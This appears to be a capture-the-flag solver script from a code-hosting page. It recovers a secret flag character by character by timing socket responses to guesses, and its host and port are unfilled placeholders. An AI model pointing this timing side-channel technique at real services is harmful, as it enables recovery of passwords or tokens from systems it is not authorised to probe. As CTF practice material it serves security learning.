You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
58 lines
1.4 KiB
58 lines
1.4 KiB
#!/bin/python3
|
|
|
|
# Timing Attack Script
|
|
|
|
import os
|
|
import time
|
|
import string
|
|
import socket
|
|
|
|
ALL_CHARS = string.ascii_lowercase + '_' + '}'
|
|
START_STR = "flag{"
|
|
|
|
def netcat(hostname, port, content):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect((hostname, port))
|
|
s.sendall(content.encode())
|
|
s.shutdown(socket.SHUT_WR)
|
|
while 1:
|
|
data = s.recv(1024)
|
|
if data.decode() == "":
|
|
break
|
|
code = repr(data.decode())
|
|
s.close()
|
|
return(str(code))
|
|
|
|
def timing_attack(flag):
|
|
HN = "hostname"
|
|
PORT = #PORT
|
|
durations = []
|
|
greatest = 0
|
|
index = 0
|
|
for i in range(28):
|
|
os.system('cls' if os.name == 'nt' else 'clear')
|
|
print(f"testing letter {ALL_CHARS[i]}...")
|
|
print(f"flag: {flag}")
|
|
flag += ALL_CHARS[i]
|
|
t_start = time.time()
|
|
return_code = netcat(HN, PORT, flag)
|
|
t_end = time.time()
|
|
duration = t_end - t_start
|
|
durations.append(duration)
|
|
l = len(flag)
|
|
flag = flag[:l-1]
|
|
for i in range(len(durations)):
|
|
if durations[i] > greatest:
|
|
greatest = durations[i]
|
|
index = i
|
|
flag += ALL_CHARS[index]
|
|
if (ALL_CHARS[index] == '}'):
|
|
print(f"the flag is: {flag}")
|
|
quit()
|
|
timing_attack(flag)
|
|
|
|
def main():
|
|
timing_attack(START_STR)
|
|
|
|
if __name__ == "__main__":
|
|
main()
|
|
|